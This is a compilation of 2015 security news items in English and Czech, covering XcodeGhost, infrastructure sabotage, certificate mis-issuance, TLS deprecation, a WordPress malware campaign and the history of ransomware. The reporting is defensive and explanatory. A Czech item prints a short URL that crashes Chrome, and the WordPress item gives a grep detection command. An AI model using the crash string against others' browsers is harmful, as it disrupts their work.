Security experts consider superficial the definition of “Vandals,” part of the security community believes that the motivation could be more dangerous, such as sabotage or cyber espionage.

Targeting critical infrastructure such as communications, grids, and power supplies are a consolidated strategy to cause large-scale damages to the target. According to the Lloyd’s of London, cyber attacks would have a significant impact on multiple types of insurance, its report “Business Blackout“, analyzed the implications of a cyber attack on the US power grid.

The “Business Blackout” report tries to describe the impacts of a cyber attack on the national power grid, which causes an electrical blackout that plunges 15 US states and principal cities, including New York City and Washington DC, into darkness. Nearly 93 million people will remain without power in the scenario hypothesized by the study.

The total of claims paid by the insurance industry is estimated to be included in the interval comprised between $21.4bn and $71.1bn, depending on the evolution of the scenarios designed by the researchers.

New attacks on critical communications infrastructure in the US 2

In 2013 the FBI investigated the attack on the PG&E electrical substation in Metcalf California, security experts hypothesized that cells of terrorists were probing the incident response in case of attack. The knowledge of the response times of the internal staff and authorities could suggest the attackers the tactic to adopt to cause major damage.

“The case of the Metcalf substation showed the sophisticated planning and targeting of a military special operation. It was the cutting of telephone cables that precluded the assault rifle attack on the cooling encasement of a high voltage transformer that distributed power to Silicon Valley which was meant to keep alarm signals from reaching critical personnel.” continues the USA Today.

Most of all of these recent attacks on US critical infrastructure occurred on the West coast, but almost identical acts of sabotage were reported in Arizona this February when unknowns targeted Internet cables. In 2014, a bomb exploded at the Nogales substation that provides power supply at the U.S. Border Patrol facilities at the Nogales U.S./ Mexican border.

Intelligence analysts speculate that the attacks in the greater San Francisco and San Jose areas can be interpreted as acts of economic warfare conducted by Russia or China.

The San Francisco area and Silicon Valley are considered privileged targets for cyber espionage, by compromising communications infrastructure attackers can have access to the data traffic and syphon sensitive information, or can inject in the targeted networks malicious code to steal intellectual property.

Stay tuned.

Apple App Store suffers its first large-scale attack

Researchers have spotted the first large-scale attack on Apple Store, attackers used XcodeGhost designed to inject malicious code into iOS and OS X apps.
Apple announced yesterday it is cleaning up the official iOS App Store to remove malicious iPhone and iPad applications, the company confirmed that this is the first large-scale attack on the official store that evaded the stringent app review process of the company.

“We’ve removed the apps from the App Store that we know have been created with this counterfeit software,” Apple spokeswoman Christine Monaghan said in an email. “We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps.”
The cyber attack was reported by several cyber security firms that detected a malicious program dubbed XcodeGhost that was used to “trojanize” hundreds of legitimate apps. The researchers confirmed that the attackers have infected several apps, including the popular mobile chat app WeChat and the music app from Internet portal NetEase.

The threat actors embedded the malicious code in these apps by deceiving developers and tricking them into use a bogus version of the Apple Xcode.

“The hackers embedded the malicious code in these apps by convincing developers of legitimate software to use a tainted, counterfeit version of Apple’s software for creating iOS and Mac apps, which is known as Xcode, Apple said.” reported the Reuters.


Palo Alto Networks is one of the firm that earlier detected the large-scale infection, its Director of Threat Intelligence Ryan Olson explained that the malicious code used by bad actors has limited functionality and at that his firm hasn’t observed a significant impact of the attack.

Anyway, what is happening is very serious, the event also demonstrates that the App Store could be used to serve malware on a large scale and there is the concrete risk of emulation for other attackers.

“Developers are now a huge target,” Olson added.

The researchers explained that the tainted version of Xcode was downloaded from a server in China, according to Olson, it is likely that developers used this specific server because it allowed for faster downloads than using Apple’s U.S. servers.

While Apple is cleaning the App Store, other security firms are working to identify other bogus applications, the Chinese security firm Qihoo360 Technology Co confirmed it had uncovered 344 apps tainted with XcodeGhost.

New updates on Cyber Conflict Agenda 2016 and what’s new in ‘Cyber power’

The 8th International Conference on Cyber Conflict (CyCon 2016) will be held in Tallinn, Estonia from 31st of May to 3th of June next year, what’s new?
The 8th International Conference on Cyber Conflict (CyCon 2016) will be held in Tallinn, Estonia from 31st of May to 3th of June next year, in order to discuss the importance of ‘cyber power’. Today, governments, the private sector, international organizations and civil society are looking to debate more about cyberspace arena.

In fact, this occasion as part of geopolitics players has a big protagonism to define what is going to happen with the traditional concept of ‘power’ and what are new trends on cyber governance to define a global mandate in Internet. From one side, ‘hard power’ as a traditional legal aspect to be deployed from governments without any substantiality until today’s, by trying to recognize the Internet as a decentralize global network. This remark doesn’t mean that global actors are not been able to contribute on harmonization of cyber conflict world-wide. Then, ‘soft power’ will be an alternative on cyberspace as a short-term action to give more arguments on thinkers and contributors towards to enhance strategic and political goals through technical, legal and economic means.

In this context, ‘cyber power’ is more political than any time before. It means that questions and remarks will be rising hands of cybernauts to proclam on high voice, how can governments ensure on enforcing ‘cyber power’ without risking conflict escalation?

If global citizens are not informed on new trends of cyber conflict, there is possible to experiment permanent cyber social protest movements and new global actions from cybernauts to demand establishment of a cyber-democracy.

Last 9th September, Anti-Virus Pioneer John McAfee entered US Presidential Race with “Cyber Party”. This demonstration was a good example of how cyber leaders are thinking more a more about ‘cyber power’. In fact, McAfee has decided to create his own party, in order to give more legitimacy to cyber democracy. Therefore, McAfee is convinced to transform cyberspace on a decentralize global network where human rights of cyber citizens must be respected, focusing on online privacy and domestic surveillance.

Finally, ‘cyber power’ is facing new updates as a potential geopolitics’ player. CyCon 2016 is a brilliant scenario to discuss what is the future of ‘cyber power’?. Which one is moving ahead ‘hard power’ or ‘soft power’ inside of today’s democracies to guarantee respect on online privacy and domestic surveillance?

Just quoting, what John McAfee said to CNN last 8th of September.

cyber conflict Agenda 2016

“We are losing privacy at an alarming rate — we have none left,” McAfee told the network. “We’ve given up so much for the illusion of security and our government is simply dysfunctional. The government can spy on people using their mobile phones while they’re with their wives and husbands.”

Is possible to maintain a balance of power in cyberspace?

About the Author Francisco Javier Delgado Villarreal

Francisco Javier Delgado Villarreal is a Junior Business Continuity, Cybersecurity and Internet Governance Consultant. His professional experience in Information and Communication Technologies has been developed since 2009 in different arenas, such as International Organizations, Governments and private sector in Ecuador and abroad.

Zadejte do Chromu zabijáckou adresu a zhroutí se

21.9.2015 Incident
Lotyšský bezpečnostní specialista Andris Atteka objevil nepříjemnou chybu v prohlížeči Chrome. Stačí navštívit speciální krátkou adresu http://a/%%30%30 a celý Chrome se zhroutí.


Chrome spadne

Jak píše na svém blogu, chyba připomíná starší a podobnou nepříjemnost ve Skypu, který se hroutil poté, co jste odeslali speciální textovou zprávu. Chyba v Chromu je už každopádně nahlášená, a tak nejspíše nebude mít dlouhého trvání.

Zdá se ale, že adresu musíte zadat do adresního řádku ručně. Pokud z řetězce uděláte klasický odkaz, prohlížeč jej validuje a zobrazí jen hlášení o neexistující stránce. V jiném případě zase zobrazila chybové hlášení už samotná stránka, na které byl odkaz na tuto chybovou adresu, Chrome totiž odkaz automaticky auditoval a zjistil problém.

Symantec vydal falešný certifikát pro i

21.9.2015 Incident

Interní testování prý může za zásadní bezpečnostní nedostatek: vydání vertifikátů pro doménu, aniž by o to vlastník žádal.
Symantec, respektive jím vlastněná certifikační autorita Thawte, vydal 14. září EV pre-certifikáty pro domény i, aniž by o to vlastník, tedy Google, žádal nebo k tomu dal svolení. Googlu se to podařilo zjistit velmi rychle prostřednictvím logů z Certificate Transparency, které od ledna podporuje Chrome.

Symantec posléze vysvětlil, že k chybnému vydání dvojice certifikátů došlo omylem, při interním testování. V platnosti vydržely zhruba jeden den, nyní jsou jejich veřejné klíče revokované v Chrome.

Jenže, jak vcelku trefně říkají Hacker News v komentáři „Symantec issues lame apology, fires wrong people in cert screwup“, výmluva Symantecu je skutečně podivná a poznámka o vyhození nesprávných lidí je také možná na místě.

Omluvu Symantecu najdete v A Tough Day as Leaders a mimo PR zdůrazňování toho, že jsou lídři na trhu, tam najdete nekonkrétní informaci o třech doménách a o tom, že nad tím „měli neustále kontrolu“ a „certifikáty revokovali okamžitě, jak na chybu přišli“. Nic víc, než nic neříkající PR řeči, které navíc neodpovídají skutečnosti, protože pokud se tyto certifikáty dostaly na veřejnost, tak je to prostě jenom klasický PR výmysl.

Firma také píše, že zaměstnanci, kteří „úspěšně prošli nástupními a bezpečnostními školeními“ selhali v otázce dodržování pravidel (a prý za to byli vyhozeni). Což naznačuje to, že Thawte (Symantec) se ve vydávání certifikátů spoléhá čistě na lidi a na to, jestli správně chápou, co dělají. A také to, že nemá žádné dodatečné ochrany, které by zajistily nevydání certifikátů pro kritické domény/služby.

V komentářích pod A Tough Day as Leaders je poměrně logicky napsáno, že místo vyhození nějakého toho nešťastníka, který stiskl klávesu, by bylo na místě vyhodit management, který umožnil, aby existoval systém, který něco takového volně umožňuje. A také to, že řeči o „lídrovi“ nic neřeší, zejména ne otázku důvěry. Protože tu je potřeba získat zpět tím, že Symantec zveřejní transparentní, nemanipulované a realistické informace o tom, co a v jakém rozsahu se přesně stalo.

Zabezpečení Applu poprvé selhalo, App Store se dostal pod velký kyberútok

21.9.2015 Zabezpečení
Populární internetovou prodejnu aplikací pro mobilní zařízení iOS App Store americké společnosti Apple napadl zákeřný program, který pronikl do stovek aplikací pro telefony iPhone a tablety iPad zejména čínských uživatelů. Jde o první velký útok na App Store, uvedla agentura Reuters.
Zákeřný program pronikl do stovek aplikací pro telefony iPhone a tablety iPad.
Apple v neděli večer oznámil, že svou prodejnu aplikací nyní od zákeřného programu čistí. Firma uvedla, že hackeři vložili škodlivý program čili malware do řady aplikací, které používají majitelé iPhonů a iPadů v Číně, tím, že oklamali vývojáře aplikací, aby používali padělanou verzi firemního softwaru pro tvorbu aplikací, jemuž Apple říká Xcode. Falešný program zvaný XcodeGhost pak hackerům umožňoval sbírat z přístrojů data.

Je to první případ, kdy se přes přísné bezpečnostní bariéry Applu dostal velký počet aplikací nakažených zákeřným programem. Předtím se vyskytlo v App Store pouze pět podobně nakažených aplikací, uvádí firma Palo Alto Networks.

„Odstranili jsme z App Store aplikace, o nichž víme, že byly vytvořeny pomocí padělaného softwaru," uvedla mluvčí Applu Christine Monaghanová. ”Spolupracujeme s vývojáři na tom, aby měli jistotu, že používají správnou verzi Xcode," dodala.

Škodlivý software zatím žádnou škodu nenapáchal
Mluvčí neuvedla, jaké kroky by uživatelé telefonů a tabletů Applu měli udělat, aby zjistili, zda jsou jejich přístroje napadeny. Ryan Olson z Palo Alto Networks ale řekl, že malware funguje jen omezeně a že jeho firma neobjevila případy krádeže ani jiných škod. Podle něj to je ale i tak „velká věc", protože to ukázalo jiným možnost narušení App Store přes vývojáře aplikací.

Pozměněná verze Xcode byla stažena z jednoho serveru v Číně. Ten vývojáři používají proto, že jim umožňuje rychlejší stahování programů než americké servery Applu.

Čínská bezpečnostní firma Qihoo360 Technology uvedla, že našla 344 aplikací, do nichž pronikl XcodeGhost. Apple počet nakažených aplikací neupřesnil.

Google to Disable Weak SSLv3 and RC4 Protocols to Boost Internet Security

It is finally time to say GoodBye to the old and insecure Web security protocols.
Citing the long history of weaknesses in the Secure Sockets Layer (SSL) 3.0 cryptographic protocol and the RC4 Cipher Suite, Google plans to disable support for both SSLv3 as well as RC4 stream cipher in its front-end servers.
While announcing on its official blog, the Search Engine giant said the company is looking to put away SSLv3 and RC4 in all of its front-end servers, and eventually, in all its software including Chrome, Android, Web crawlers, and email servers.
The move by Google came as no surprise, considering the fact that both RC4 and SSLv3 have been deemed unsecure by the Internet Engineering Task Force (IETF).
What are the Problems?
SSLv3, which was made outdated 16 years ago, has a long history of security problems like BEAST, out of them the most recent one was POODLE (Padding Oracle On Downgraded Legacy Encryption) attacks, which lead to the recovery of plaintext communication.
The IETF officially declared SSLV3 dead and buried, and condemned SSLv3 in an Internet Standards Track document published three months ago, calling it "not sufficiently secure" and prohibiting fallback to SSLv3 in new applications.
RC4 (Rivest Cipher 4) is 28 years old cryptographic cipher suite and still used by about 50% of all TLS traffic.
RC4 has been attacked multiple times over the years that sometimes lead to TLS session compromise and cookie decryption.
Recently, two Belgian security researchers also showed a more practical and feasible attack technique against the RC4 cryptographic algorithm, allowing attackers to subsequently expose encrypted data in a much shorter amount of time than was previously possible.
What can You do About This?
The best solution to these security hurdles is to disable SSLv3 and RC4 support, and Google will be doing the same.
Google will slowly be disabling SSLv3 and RC4 support on its front end servers and across all of its products, including Chrome, Android, and email servers.
Though, the company is also establishing new recommended minimum TLS standards for the future, so websites and TLS clients can automatically upgrade to safer protocols.
Google's Initiative
As many embedded systems and other client applications that connect to Google's services can not be easily upgraded to support new crypto protocols, the search engine recommends new devices and apps to adopt:
TLS (Transport Layer Security) 1.2 must be supported
A Server Name Indication (SNI) extension must be included in the handshake and must contain the domain that it is being connected to.
The cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 must be supported with P-256 and uncompressed points.
At least the certificates in '' must be trusted.
Certificate handling must be able to support DNS Subject Alternative Names and those SANs may include a single wildcard as the left-most label in the name.
It doesn't mean that the devices and apps that don't meet these requirements will stop working anytime soon, but they may be affected by the changes through the year 2020, notes Adam Langley, a security engineer for the company.

Is This Security-Focused Linux Kernel Really UnHackable?

Can you name which Operating System is most Secure?
...Windows, Mac, Linux or any particular Linux Distribution?
Yes, we get that! It’s not an easy thing to pick.
Besides Windows, Even the so-called ultra-secure Linux Distros were found to be vulnerable to various critical flaws in past years.
Because, almost all Linux Distros use the same Kernel, and the most number of cyber attacks target the Kernel of an operating system. So, It doesn't matter which Linux distribution you use.
The kernel is the core part an operating system, which handles all the main activities and enforces the security mechanisms to the entire operating system.
Making an Operating System secure requires that vulnerabilities shall not exist in the Kernel, which is the communicating interface between the hardware and the user.
To overcome the above situation, Security Researchers, Mathematicians and Aviation gurus from Boeing and Rockwell Collins joined a team of dedicated NICTA researchers to developed an open source, unhackable bug-free MicroKernel named “seL4”.
seL4 (Secure Microkernel Project) Linux kernel is already being used to protect Drones, Helicopters, medical devices and power stations from hacking attacks.
UnHackable Linux Kernel. Really?
Do you think...? I don't think so...
Recently, ‘The Hacker News’ wrote an article about Top 7 Brutal Cyber Attacks that Proves No one is Immune to Hacking.
Because — For Hackers, If One Door Closes, They’ll Find a New Way to Enter.
However, last year, Researcher proved mathematically that their seL4 kernel is unhackable and promises high-performance with robust Security mechanisms that are even harder to Crack.
According to seL4 website: It is an "operating-system kernel with an end-to-end proof of implementation correctness and security enforcement is available as open source".
seL4 is a 3rd Generation MicroKernel, which is designed to detect & foil hacking attempts. It supports various L4 microkernels features, including:
Compact size.
High performance.
Built-in capability model is enforcing security at operating system as well as application levels.
The principle of least privilege.
The researchers explain seL4 with a proof by saying, “...the specification and the seL4 binary satisfy the classic security properties called integrity and confidentiality.”
Need of such a microkernel generated because of the increase in development of embedded devices, portable devices and their use in domains like armed forces, medical devices and household devices etc, and related cyber attacks on them.
Remember Car Hacking? Can seL4 Stop It?
Yes, Car Hacking... Recently demonstrated by a pair of hackers who controlled a Jeep Cherokee remotely from miles away.
Well, we can’t stop hackers getting access to things like a Wi-Fi enabled Car’s entertainment system, because attackers often use a non-critical system as a springboard to access critical hardware like steering.
However, Researchers behind kernel development claimed that seL4 will keep systems separate to protect them.
An earlier version of seL4, called OKL4, is already now installed in millions of Smartphones.
Several projects based on seL4 are under development with the aim of conquering a large number of cyber attacks being executed on an operating system as the victim. Also, entities like DARPA, NICTA and CSIRO are engaged in the fulfillment of such projects.

When a 'Hacker News' Reader Tricked Me into visiting this Amazing Site (Don't Click at Work)

My usual bed routine is to check comments under my articles before I go to sleep. The same I was doing last night, but something weird happened to me.
Someone posted a mysterious short link without any text below one of my articles on our official 'The Hacker News' Facebook Page, and with the curiosity to check that link I visited that website. And what I saw…
One by one my every single account I logged in into my web browser got automatically logged out just in few seconds in front of my eyes.
This is exactly what Super Logout does.
Log Out All Your Accounts in Just One Click
Yes, Super Logout – a website that logs you out of over 30 major Internet services just in one click.
You can visit 'Super Logout' here. (Note: Once clicked, this will log you out instantly from all your online accounts and don't worry it is neither harmful, nor malicious)
This is a great tool for people who:
Usually visit Internet Cafes for surfing Internet
Surf the Internet using public Wi-Fi
Use computers in office, libraries or PCs other than their own
Have an odd habit of logging out of all their online accounts at the end of each day
Superlogout website is one that will make your logging out process very simple if you use multiple accounts in one browser and want to simplify the process.

Going through the source code of the web page, I found that the website is using a simple JavaScript code that loads the logout URLs of all below mentioned Online Services and deletes your login sessions.
Here's the List of Online Services Super Logout Logs Out

As soon as you visit Superlogout, it will automatically start logging you out one by one of a few dozen major services including:
Dozons more…
Despite the Superlogout developer has not included Facebook and Twitter in the list, it is a quick way to logout of many websites at once. And we hope to see Facebook and Twitter in a future update.

AVG Antivirus Plans to Collect & Sell Your Personal Data to Advertisers

We at The Hacker News are big fans of Security Software – The first thing we install while setting our Computers and Devices.
Thanks to Free Security Software that protects Internet users without paying for their security.
But, Remember: Nothing comes for FREE
"Free" is just a relative term, as one of the world's most popular anti-virus companies is now admitting.
Czech Republic-based antivirus company AVG has announced its privacy policy in which the company openly admits that it will collect and sell users' data to online advertisers for the purpose of making money from its free antivirus software.
This new policy, which will come into effect on October 15, clearly explains that AVG will be allowed to collect and sell users' "non-personal data" in order to "make money from our free offerings so we can keep them free."
Have a Look on Your Data AVG wants to Sell
Here's the list of, what AVG calls, "non-personal data" the company claims to collect from its customers and sell to interested third-parties, specifically online advertisers:
Browsing History,
Search History,
Advertising ID associated with your device,
Internet Service Provider (ISP) or Mobile Network you use to connect to AVG products,
Information regarding other apps you have on your device.
Previous policies allowed the firm to only collect:
Data on "the words you search",
Information about any malware on the users' machine.
Collaborators will Get your Personal Data for Free
However, announcing its new policy, the firm has mentioned that it will not sell any personal data related to its customers, including name, email addresses, residential addresses, or credit card details (but these data might sometimes leak inside the browsing history).
At this point, AVG claims that the company will filter out users' personal details from the browsing history before selling it to the third-parties, but also adds that user's personally identifiable data like addresses, age, or IPs may sometimes be shared with collaborators.
The company has published a blog post along with the full privacy policy, so you can read it and decide by yourself if you want to use its services or not.

With Its First Android app, Apple tried to Kill Android Community, But Failed Badly!

Are you a Die Hard Android Fan?
If you are also one of those millions Android fans, for whom the brand has turned into an insane religious devotion, then Apple has something that could give you second thoughts.
Apple is losing control, wants you to ditch your Android!
Few days ago, Apple made its debut on Google Play Store with its First App, called “Move to iOS”, for Android Users.
With its first ever Android app, Apple tried to kill Android Community and fans, But failed badly!
Apple’s new app works as an “Uncalled Assistance” in a manner where you have bought a new iPhone, iPad or iPod Touch and are confused about how to migrate data from your current Android device.
Apple’s ‘Move to iOS’ app is designed to help Android users transfer their content quickly and safely from an Android device to an iOS device.
The Apple App will help you in Migrating Data, like:
Camera photos and videos
Mail accounts
Message history
Web bookmarks
How does It work?
Now, it is time for the synchronization between the two devices shall begin.
The app will create a private Wi-Fi session from your iOS device and will pick your Android device loaded with Move to iOS app for the transfer of data to start.
Then open ‘Move to Android’ interface on your iOS device and after you Tap start, a 10-digit security code will pop-up which you’ll have to enter on your Android device with ‘Move to iOS’ screen on display.
After this, you can select your content from your Android device that you wish to transfer by tapping Next button and set up your new iOS device.
However, remember one thing, don’t let any distractions like a phone call to occur, because if they do the transfer will stop, and you’ll have to start all over again.
For smooth transfer of data, choose a time when the chances of getting distracted are less.
Android Fans Reacted (More than 22k Negative Reviews) Angrily!
Unsurprisingly, More than 22,000 Android users reacted angrily on Google Play Store, and branded Apple’s app in review section as: 'Pointless', ‘Useless’, 'Garbage', 'Inferior' and thousand of negative comments.
Why? While going through the user's responses at Play Store, we found some interesting reviews:
"Come on. Google has supported your platform with their services from the start, even as your rival. I barfed a little in my mouth when I heard that this would be your first app on the Android platform, but this is what I've come to expect out of Apple as a company.", Android users commented.
“Seriously? You think people want to move to a restricted ecosystem that won't even allow you to try apps before you buy??” Another Android users commented.
“Why? Now you want Android users to switch to your so called premium products where you copy features from other ecosystem and say pathbreaking technology. Don't need one.” and one more.
Also, at the time of writing: More than 22,650 Android users have posted their Negative Reviews, with 1-star on Play Store, as shown.

Microsoft has Built its own Linux Operating System

Sit Tight on your seats, because you're gonna get a Shock.
Microsoft has developed an Operating System powered by LINUX.
Close your mouth first. It’s True!
Microsoft has built its own Linux-based operating system called Azure Cloud Switch (ACS) and believe me, under Satya Nadella, Microsoft has become more open than ever.
According to the announcement made through an official blog post on Microsoft website, Azure Cloud Switch (ACS) describes as "cross-platform modular operating system for data center networking built on Linux." or Simply, "Commodity switch software stack for data center networks".
The Purpose of developing Linux-based Azure Cloud Switch (ACS) operating system at Microsoft is to make it simpler to control the hardware from multiple vendors (such as Switches) that powers their cloud-based services.
And here's the Kicker:
"Running on Linux, ACS [Azure Cloud Switch] is able to make use of its vibrant ecosystem. ACS allows to use and extend Open Source, Microsoft, and Third Party applications."
You can see the main functional blocks from top to the bottom of the ACS stack as shown in the image below.
Microsoft has Built its own Linux Operating System
However, Microsoft's Linux distribution is not going to appear on Desktops or Servers anytime soon, because this isn't a typical consumer-grade Operating System.
For Now, Azure Cloud Switch (ACS) Linux OS is just an internal tool that Microsoft uses to "debug, fix as well as test software bugs much faster", scale down software and develop features for enterprise and cloud computing services.
Microsoft Azure Cloud Switch (ACS) was demonstrated at the SIGCOMM conference in August 2015 at Imperial College London.
This move by Satya Nadella's Microsoft is really significant.
If you’re interested in the technical deep dive into Azure Cloud Switch (ACS), you will find it on the Microsoft Azure blog.
Microsoft... To Win, Make Love, Not War.
It is not the first time that Microsoft is partnering with rival technologies.
Earlier this year, Microsoft had announced its partnership with Cyanogen, the most popular third-party ROM for Android phones and tablets.
And Cyanogen is reportedly working on deeper integration of Microsoft’s Digital personal virtual assistant, Cortana, into its latest version of Operating System.

Thousands of Hacked WordPress Sites Abused to Infect Millions of Visitors

A Large number of WordPress websites were compromised in last two weeks with a new malware campaign spotted in the wild.
WordPress, a Free and Open source content management system (CMS) and blogging tool, has been once again targeted by hackers at large scale.
Researchers at Sucuri Labs have detected a “Malware Campaign” with an aim of getting access to as many devices they can by making innumerable WordPress websites as its prey.
The Malware campaign was operational for more than 14 days ago, but it has experienced a massive increase in the spread of infection in last two days, resulted in affecting more than 5000 Wordpress websites.
The Security researchers call this malware attack as “VisitorTracker”, as there exists a javascript function named visitorTracker_isMob() in the malicious code designed by cyber criminals.
This new campaign seems to be utilizing the Nuclear Exploit Kit and uses a combination of hacked WordPress sites, hidden iframes and number of known and unknown Browser exploits.
Though if we go by the name, it’s meaning can be extracted as tracking every visitor who accesses the victimized WordPress sites and further redirects them to the specially crafted page where the Nuclear Exploit Kit is planted.
So, Plan of Action is:
Insert a malware code to all the JavaScript files on the compromised WordPress website.
On sensing a Visitor, Taking him to the exploit landing page via an iFrame.
The landing page pushes browser based Exploits on the victim’s system to gain access.
If Introspect, we'll notice that the exploit kit being used here can deploy attacks through vulnerabilities in plugins with an aim of data exfiltration.
The Sucuri researchers team as a solution suggest, “The infection is very buggy and often removed single-quotes from legitimate files that corrupt the site completely. Affects plugins, themes and even core files of WordPress and Joomla. The solution is to restore files from a clean backup.”
Moreover, to check if you are affected by the attack follow the below-mentioned command: (user with Admin rights can access)
grep -r “visitorTracker_isMob” /var/www/
Additionally, as a prevention:
Keep your plugins up-to-date, with latest security patches implemented.
Always maintain a backup of your sensitive data.

D-Link Accidentally Publishes Its Private Code-Signing Keys on the Internet

It's not every time malware creators have to steal or buy a valid code-signing certificate to sign their malware – Sometimes the manufacturers unknowingly provide themselves.
This is what exactly done by a Taiwan-based networking equipment manufacturer D-Link, which accidently published its Private code signing keys inside the company's open source firmware packages.
Dutch news site Tweakers made aware of the issue by one of its readers with online moniker "bartvbl" who had bought a D-Link DCS-5020L security camera and downloaded the firmware from D-Link, which open sources its firmware under the GPL license.
However, while inspecting the source code of the firmware, the reader found what seemed to be four different private keys used for code signing.
Hackers Could Sign Malware
After testing, the user managed to successfully create a Windows application, which he was able to sign with one of the four code signing keys belonging to D-Link, which was still valid at the time.
However, the other three private code signing keys he found did not appear to be valid.
Besides those private keys into the source code, the reader also discovered pass-phrases needed to sign the software.
It is still unclear whether these private keys have been used by malicious third-party vendors, but there are possibilities that the keys could have been used by hackers to sign their malware to execute attacks.
The findings were confirmed by Yonathan Klijnsma from Dutch security firm Fox-IT.
"The code signing certificate is indeed a firmware package, firmware version 1.00b03, who's source was released February 27 this year," Klijnsma said.
Meanwhile, D-Link has responded to this issue by revoking the certificate in question and releasing a new version of the firmware that does not contain have any code signing keys inside it.

Google Details Plans to Disable SSLv3 and RC4

As expected, Google formally announced its intent to move away from the stream cipher RC4 and the SSLv3 protocol this week, citing a long history of weaknesses in both.

Adam Langley, a security engineer for the company, announced the plans through a blog post on Thursday. While there isn’t a concrete timeline, Langely insisted that Google is looking to do away with support for RC4 and SSLv3 in all of its frontend servers, Chrome, Android, webcrawlers, and SMTP servers, in the medium term.

The fact that the company is looking cut ties with both mediums shouldn’t come as little surprise.

The Internet Engineering Task Force condemned SSLv3 in an Internet Standards Track document over the summer, calling it “not sufficiently secure,” adding that “any version of TLS is more secure than SSLv3.”

As Langely notes in the blog, RC4 is 28 years old, and while it fared well in the early goings, it’s been the target of multiple attacks over the years, including some that can lead to TLS session compromise and cookie decryption.

As part of the switch Google also announced a collection of minimum standards for TLS clients going forward. According to the post, Google will eventually require the following of devices:

TLS 1.2 must be supported.
A Server Name Indication (SNI) extension must be included in the handshake and must contain the domain that’s being connected to.
The cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 must be supported with P-256 and uncompressed points.
At least the certificates in must be trusted.
Certificate handling must be able to support DNS Subject Alternative Names and those SANs may include a single wildcard as the left-most label in the name.
Langley notes that devices that don’t meet the requirements won’t stop working anytime soon, but acknowledges they may be affected by TLS changes later down the line, up to the year 2020.

“If your TLS client, webserver or email server requires the use of SSLv3 or RC4 then the time to update was some years ago, but better late than never. However, note that just because you might be using RC4 today doesn’t mean that your client or website will stop working: TLS can negotiate cipher suites and problems will only occur if you don’t support anything but RC4,” Langley wrote.

Langely announced cursory plans to deprecate RC4 earlier this month in a post to the mailing list, confirming that the cipher would be disabled in a future Chrome build, likely stable around January or February 2016.

The company has already taken one step towards nixing SSLv3: a month after last fall’s POODLE attack it did away with support for the fallback to SSLv3 in Chrome, a move that went hand in hand with the company’s phasing out of the SHA-1 cryptographic hash algorithm.

The evolution of ransomware: From PC Cyborg to a service for sale

Without a doubt, malware is – and has always been – one of the main threats to IT. Over the years, it has become one of the primary causes of security incidents, from the early years with viruses, to more sophisticated and relatively high-impact threats such as ransomware.
Similarly, the reasons for developing and distributing malicious code have changed over time from testing a system’s functionality in order to gain recognition for the malware’s creators, to reaping some kind of benefit – mainly financial profit – in an increasingly quicker timeframe.
In this post, we will take a look at the evolution of ransomware, the type of malware used mostly for hijacking user data, from its initial versions to the most recent cases, where it is now sold on the market as a service.
The beginnings of information hijacking, way back in 1989

Much has been written about cases of ransomware in these pages, and particularly about the many different campaigns to distribute and infect machines with variants of this family of malware, which has proved highly profitable for its developers. For example, in the 2015 Trustwave Global Security Report, it was estimated that cybercriminals can get up to 1,425 per cent return on investment for a malware campaign of this kind.
Although it is not a new idea, information hijacking has acquired new relevance in recent years due to its impact on users and companies that have been negatively affected by malware which performs this function, and also due to its increasing diversification.
The first case of ransomware dates back to 1989, with the appearance of a trojan called PC Cyborg. This replaced the AUTOEXEC.BAT file, hid the folders and encrypted the names of all the files on the C drive, rendering the system unusable. The user was then asked to “renew their license” by paying $189 to the PC Cyborg Corporation.
In the years that followed, new versions of programs seeking to extort money from users were identified, but unlike the symmetric encryption used by PC Cyborg, these newer programs employed asymmetric encryption algorithms with increasingly long keys. For example, in 2005, the GPCoder came to light, followed by a series of variants, which first encrypted files with certain extensions and then demanded a payment of between $100 to $200 as a ransom for the encrypted information.
Some variants derived from ransomware

After the first cases of ransomware, other types of malware emerged that worked on the same principle of making information inaccessible. However, rather than using encryption, they instead blocked the user’s system.
One of these is WinLock, a malware program that was first identified in 2010. This would infect the user’s computer, then block it and display a message across the screen that demanded a payment. To obtain the unblock code, the affected user would have to send an SMS message which would cost them around $10. So, rather than affecting files, the focus had turned to blocking access to the user’s equipment and information.
In a similar vein, 2012 saw the emergence of the so-called “police virus” Reveton, which blocked access to the affected user’s system. This malware would display a fake message – supposedly from the local police authority of the country where the threat was taking place – telling the user that they had broken the law. To restore access to their system, a “fine” would have to be paid.
Or so the user thought – regaining access was actually relatively simple. By starting the system in safe mode and then deleting a registry key, the user could access their equipment again without needing to pay the money demanded.
When did ransomware increase in quantity and complexity?

In recent years there have been new waves of malware designed to encrypt the user’s information, enabling cybercriminals to demand a ransom payment that will allow the user to decrypt the files, and these are detected by ESET security solutions as filecoders.
In 2013, we learned about the importance of CryptoLocker due to the number of infections that occurred in various countries. Its main characteristics include encryption through 2048-bit RSA public key algorithms, the fact that it targets only certain types of file extensions, and the use of C&C communications through the anonymous Tor network.
Almost simultaneously, CryptoWall (a variant of CryptoLocker) made its appearance and succeeded in outdoing its predecessor in terms of the number of infections, partly due to the attack vectors employed: from exploit kits in browsers and drive-by-download attacks to the most common method of sending malicious files as email attachments. This type of malware has adapted over time and evolved into a third version, with changes to various characteristics including its vectors of infection and payment methods.
Earlier this year, a new wave of ransomware was identified with the appearance of CTB-Locker, which can be downloaded onto the victim’s computer by means of a TrojanDownloader. Of the various versions in circulation, one was aimed at Spanish-speakers, featuring messages and instructions on making payments written in Spanish.
One of the features of this malware, also known as Critroni, is that it encrypts files on the hard disk, on removable drives and on network drives by using an irreversible elliptic curve algorithm. For the creator to maintain their anonymity, they connect to the C&C server via Tor and demand a ransom of eight bitcoins.
Ransomware has grown in diversity too

We have borne witness to how this type of threat has increased in scale, with increasingly complex mechanisms that make it almost impossible to get back the information without having to make a payment to the cybercriminal. Even then, that is no guarantee that the files will be recoverable.
Similarly, the threat has increased in terms of diversity too. For example, in 2014, we saw the first case of filecoder malware for Android, which is currently the most widespread platform for mobile devices. SimpLocker appeared on the scene displaying the same messages that were used for the police virus. It worked by scanning the device’s SD card for files with specific extensions for the same purpose: to encrypt them and then demand a ransom payment in exchange for decrypting them.
Other similar malware like AndroidLocker has appeared too. Its main characteristics include impersonating legitimate security solutions and applications for Android, in order to try and gain a user’s trust.
